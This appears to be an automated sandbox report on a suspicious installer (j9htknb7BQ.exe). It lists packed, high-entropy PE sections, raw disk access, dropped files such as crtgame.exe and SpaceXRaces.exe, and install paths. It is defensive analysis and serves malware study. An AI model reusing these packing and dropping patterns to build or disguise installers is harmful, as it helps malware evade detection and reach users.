                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpWindow found: window name: TMainFormJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: j9htknb7BQ.exeStatic file information: File size 7246011 > 1048576
                  Source: Binary string: X:\delphi\xrecode3\src\c\DLL\visualc\libmp4v2\bin\Windows-Win32\Release\libmp4v2.pdb source: is-U01MD.tmp.1.dr
                  Source: Binary string: D:\lame-3.100-SVN-20200409\Dll\Win32\Release NASM\lame_enc.pdb source: is-MGR1O.tmp.1.dr

                  Data Obfuscation

                  barindex
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeUnpacked PE file: 5.2.crtgame.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.hsave:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeUnpacked PE file: 5.2.crtgame.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0044C030 LoadLibraryA,GetProcAddress,GetProcAddress,1_2_0044C030
                  Source: initial sampleStatic PE information: section where entry point is pointing to: petite
                  Source: crtgame.exe.1.drStatic PE information: section name: .hsave
                  Source: is-2DM26.tmp.1.drStatic PE information: section name: /4
                  Source: is-QASVM.tmp.1.drStatic PE information: section name: /4
                  Source: is-R3MEC.tmp.1.drStatic PE information: section name: /4
                  Source: is-J4G02.tmp.1.drStatic PE information: section name: /4
                  Source: is-J4G02.tmp.1.drStatic PE information: section name: /19
                  Source: is-J4G02.tmp.1.drStatic PE information: section name: /31
                  Source: is-J4G02.tmp.1.drStatic PE information: section name: /45
                  Source: is-J4G02.tmp.1.drStatic PE information: section name: /57
                  Source: is-J4G02.tmp.1.drStatic PE information: section name: /70
                  Source: is-J4G02.tmp.1.drStatic PE information: section name: /81
                  Source: is-J4G02.tmp.1.drStatic PE information: section name: /92
                  Source: is-MGR1O.tmp.1.drStatic PE information: section name: .trace
                  Source: is-MGR1O.tmp.1.drStatic PE information: section name: _RDATA
                  Source: is-MGR1O.tmp.1.drStatic PE information: section name: .debug_o
                  Source: is-89IOF.tmp.1.drStatic PE information: section name: /4
                  Source: is-O2JHA.tmp.1.drStatic PE information: section name: /4
                  Source: is-PC991.tmp.1.drStatic PE information: section name: /4
                  Source: is-15SLJ.tmp.1.drStatic PE information: section name: /4
                  Source: is-NTP22.tmp.1.drStatic PE information: section name: /4
                  Source: is-6AF6U.tmp.1.drStatic PE information: section name: /4
                  Source: is-I69V3.tmp.1.drStatic PE information: section name: /4
                  Source: is-4L1QL.tmp.1.drStatic PE information: section name: /4
                  Source: is-9BPGE.tmp.1.drStatic PE information: section name: /4
                  Source: is-V4Q5G.tmp.1.drStatic PE information: section name:
                  Source: is-V4Q5G.tmp.1.drStatic PE information: section name:
                  Source: is-V4Q5G.tmp.1.drStatic PE information: section name: petite
                  Source: is-4DA3B.tmp.1.drStatic PE information: section name: /4
                  Source: is-PA44V.tmp.1.drStatic PE information: section name:
                  Source: is-PA44V.tmp.1.drStatic PE information: section name:
                  Source: is-PA44V.tmp.1.drStatic PE information: section name: petite
                  Source: is-M6FGJ.tmp.1.drStatic PE information: section name:
                  Source: is-M6FGJ.tmp.1.drStatic PE information: section name:
                  Source: is-M6FGJ.tmp.1.drStatic PE information: section name: petite
                  Source: is-KJFHV.tmp.1.drStatic PE information: section name:
                  Source: is-KJFHV.tmp.1.drStatic PE information: section name: petite
                  Source: is-KVRT3.tmp.1.drStatic PE information: section name:
                  Source: is-KVRT3.tmp.1.drStatic PE information: section name:
                  Source: is-KVRT3.tmp.1.drStatic PE information: section name: petite
                  Source: is-INJF5.tmp.1.drStatic PE information: section name: /4
                  Source: is-8KTA3.tmp.1.drStatic PE information: section name: .sxdata
                  Source: is-53LMN.tmp.1.drStatic PE information: section name: .didata
                  Source: is-L2U9S.tmp.1.drStatic PE information: section name:
                  Source: is-L2U9S.tmp.1.drStatic PE information: section name:
                  Source: is-L2U9S.tmp.1.drStatic PE information: section name: petite
                  Source: is-Q99K1.tmp.1.drStatic PE information: section name:
                  Source: is-Q99K1.tmp.1.drStatic PE information: section name: petite
                  Source: is-PE6Q4.tmp.1.drStatic PE information: section name:
                  Source: is-PE6Q4.tmp.1.drStatic PE information: section name:
                  Source: is-PE6Q4.tmp.1.drStatic PE information: section name:
                  Source: is-QRNOQ.tmp.1.drStatic PE information: section name:
                  Source: is-QRNOQ.tmp.1.drStatic PE information: section name:
                  Source: is-QRNOQ.tmp.1.drStatic PE information: section name: petite
                  Source: is-1GFJF.tmp.1.drStatic PE information: section name:
                  Source: is-1GFJF.tmp.1.drStatic PE information: section name:
                  Source: is-1GFJF.tmp.1.drStatic PE information: section name:
                  Source: is-OMTUV.tmp.1.drStatic PE information: section name:
                  Source: is-OMTUV.tmp.1.drStatic PE information: section name:
                  Source: is-OMTUV.tmp.1.drStatic PE information: section name: petite
                  Source: is-RV1NR.tmp.1.drStatic PE information: section name:
                  Source: is-RV1NR.tmp.1.drStatic PE information: section name:
                  Source: is-RV1NR.tmp.1.drStatic PE information: section name: petite
                  Source: is-7M8GD.tmp.1.drStatic PE information: section name:
                  Source: is-7M8GD.tmp.1.drStatic PE information: section name:
                  Source: is-7M8GD.tmp.1.drStatic PE information: section name:
                  Source: is-VNLOG.tmp.1.drStatic PE information: section name:
                  Source: is-VNLOG.tmp.1.drStatic PE information: section name:
                  Source: is-VNLOG.tmp.1.drStatic PE information: section name: petite
                  Source: is-LKN3T.tmp.1.drStatic PE information: section name: /4
                  Source: is-M9NVL.tmp.1.drStatic PE information: section name: /4
                  Source: is-NFQ3O.tmp.1.drStatic PE information: section name: /4
                  Source: is-0H0B1.tmp.1.drStatic PE information: section name: /4
                  Source: is-R3T6A.tmp.1.drStatic PE information: section name:
                  Source: is-R3T6A.tmp.1.drStatic PE information: section name:
                  Source: is-R3T6A.tmp.1.drStatic PE information: section name:
                  Source: is-TN6ID.tmp.1.drStatic PE information: section name: /4
                  Source: is-RRVDV.tmp.1.drStatic PE information: section name: .eh_fram
                  Source: is-15Q83.tmp.1.drStatic PE information: section name: asmcode
                  Source: is-N90RR.tmp.1.drStatic PE information: section name: .eh_fram
                  Source: is-LCCKT.tmp.1.drStatic PE information: section name: /4
                  Source: is-US51G.tmp.1.drStatic PE information: section name: /4
                  Source: is-DSQCO.tmp.1.drStatic PE information: section name: /4
                  Source: SpaceXRaces.exe.5.drStatic PE information: section name: .hsave
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: 0_2_004065B8 push 004065F5h; ret 0_2_004065ED
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: 0_2_00408104 push ecx; mov dword ptr [esp], eax0_2_00408109
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00409954 push 00409991h; ret 1_2_00409989
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0040A04F push ds; ret 1_2_0040A050
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0040A023 push ds; ret 1_2_0040A04D
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_004062CC push ecx; mov dword ptr [esp], eax1_2_004062CD
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_004822F4 push 004823D2h; ret 1_2_004823CA
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_004765B0 push ecx; mov dword ptr [esp], edx1_2_004765B1
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_004106E0 push ecx; mov dword ptr [esp], edx1_2_004106E5
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00412938 push 0041299Bh; ret 1_2_00412993
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_004589F0 push 00458A34h; ret 1_2_00458A2C
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00442C94 push ecx; mov dword ptr [esp], ecx1_2_00442C98
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00450E58 push 00450E8Bh; ret 1_2_00450E83
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0045101C push ecx; mov dword ptr [esp], eax1_2_00451021
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0040D038 push ecx; mov dword ptr [esp], edx1_2_0040D03A
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0049310C push ecx; mov dword ptr [esp], ecx1_2_00493111
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_004571B0 push 004571E8h; ret 1_2_004571E0
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0045F444 push ecx; mov dword ptr [esp], ecx1_2_0045F448
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0040546D push eax; ret 1_2_004054A9
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0040553D push 00405749h; ret 1_2_00405741
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0040F598 push ecx; mov dword ptr [esp], edx1_2_0040F59A
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_004055BE push 00405749h; ret 1_2_00405741
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0040563B push 00405749h; ret 1_2_00405741
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
                  Source: crtgame.exe.1.drStatic PE information: section name: .text entropy: 7.600836004242041
                  Source: is-PE6Q4.tmp.1.drStatic PE information: section name: entropy: 7.953893773659523
                  Source: is-1GFJF.tmp.1.drStatic PE information: section name: entropy: 7.921519965168042
                  Source: is-RV1NR.tmp.1.drStatic PE information: section name: entropy: 7.966771808365004
                  Source: is-7M8GD.tmp.1.drStatic PE information: section name: entropy: 7.950928332152424
                  Source: is-R3T6A.tmp.1.drStatic PE information: section name: entropy: 7.491817342209834
                  Source: SpaceXRaces.exe.5.drStatic PE information: section name: .text entropy: 7.600836004242041

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive05_2_00401A58
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive07_2_02BCF29C
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-15Q83.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-U01MD.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-MGR1O.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-LCCKT.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\takdec.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\lame_enc.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-2DM26.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-INJF5.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-0B8UA.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-R3T6A.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-UK2TT.tmp\_isetup\_isdecmp.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-4DA3B.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-R3MEC.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-6AF6U.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-QRNOQ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-M6FGJ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-NTP22.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-QASVM.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-4L1QL.tmpJump to dropped file
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile created: C:\ProgramData\SpaceXRaces\SpaceXRaces.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-KVRT3.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-UK2TT.tmp\_isetup\_RegDLL.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-RV1NR.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-PC991.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-1L7JU.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-UK2TT.tmp\_isetup\_setup64.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\sd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-LKN3T.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\rg_ebur128.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-TN6ID.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-J4G02.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-1GFJF.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-7M8GD.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-V1IHP.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\uchardet.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libmp4v2.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-RRVDV.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-53LMN.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libsox-3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-Q99K1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libsoxr.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-V4Q5G.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-PA44V.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-UK2TT.tmp\_isetup\_iscrypt.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-O2JHA.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-L2U9S.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-I69V3.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libwebp.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\swresample-4.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-KJFHV.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\crtgame.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-UK2TT.tmp\_isetup\_shfoldr.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-0H0B1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-768F1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\uninstall\unins000.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libFLAC_dynamic.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-PE6Q4.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\wavpackdll.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-8KTA3.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\uninstall\is-0C5FH.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-VNLOG.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\tak_deco_lib.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libdtsdec.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-15SLJ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-NFQ3O.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-OMTUV.tmpJump to dropped file
